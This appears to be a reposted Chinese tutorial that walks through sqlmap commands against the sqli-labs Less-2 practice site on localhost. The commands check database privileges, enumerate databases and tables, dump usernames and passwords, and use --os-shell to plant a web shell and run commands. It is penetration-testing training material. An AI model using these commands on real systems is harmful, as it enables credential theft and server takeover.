码上快乐

相关内容   简体   繁体

使用sqlmap进行MySQL数据库的注入,sqlmap工具使用

本文转载自  查看原文  2021-05-08 08:56  308    渗透测试/ sql注入

环境

  • phpstudy
  • sqli-labs

本次注入中我们使用sqli-labs的less-2作为测试网站

使用sqlmap进行MySQL数据库的注入

检测是否存在注入

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1

显示payload详细信息

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -v 3

当前数据库用户是否是高权限用户

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --is-dba

查看当前用户的权限

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --privileges

爆数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --dbs

爆当前数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --current-db

爆所有数据库的所有表(比较慢,因为所有数据库中的表太多了)

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --tables

爆指定数据库的所有表

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -tables -D security

爆指定表的所有列

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -columns -T users -D security

爆指定列的指定字段

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -dump -C id,username,password -T users -D security

sqlmap写入shell

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --os-shell

这里我们是php的环境,我们选择4

这里我们选择2,自定义路径,我们输入路径phpstudy/www,注意:不能跨盘符,的phpstudy安装的位置是D:\phpStudy

选择接受标准输出,随后进行命令执行

回头看看我们的文件夹,文件夹中出现了写入的shell

参考博客


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 sqlmap从入门到精通-第五章-5-4 使用sqlmap进行Oracle数据库注入与防御 【SQL注入】之SQLMAP工具的使用 使用sqlmap对进行php+mysql注入实战 SQLMAP注入Access数据库 使用sqlmap进行post型sql注入 kali之使用sqlmap进行sql注入 SQLmap工具介绍及其使用 渗透测试环境搭建以及使用sqlmap获取mysql用户数据库密码 sqlmap从入门到精通-第三章-3-3 使用sqlmap进行SOAP注入 dvwa:使用sqlmap进行中级sql注入
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM